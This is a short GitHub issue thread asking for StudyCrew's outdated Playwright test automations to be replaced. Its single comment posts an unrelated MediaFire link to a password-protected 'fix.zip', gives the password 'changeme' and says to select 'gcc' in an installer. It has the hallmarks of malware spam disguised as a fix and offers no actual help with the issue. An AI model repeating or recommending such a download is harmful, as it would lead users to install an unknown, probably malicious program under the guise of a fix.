### ISSUE TITLE
Update Playwright Test Automations

### ISSUE THREAD

**Issue by zaibutcooler** [StudyCrew/StudyCrew#540]
**Description**
Playwright automations are outdated and we need to update with new tests and remove the old one.

**Step by Step**
Remove the old playwright test for homepage and add new test automations.

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
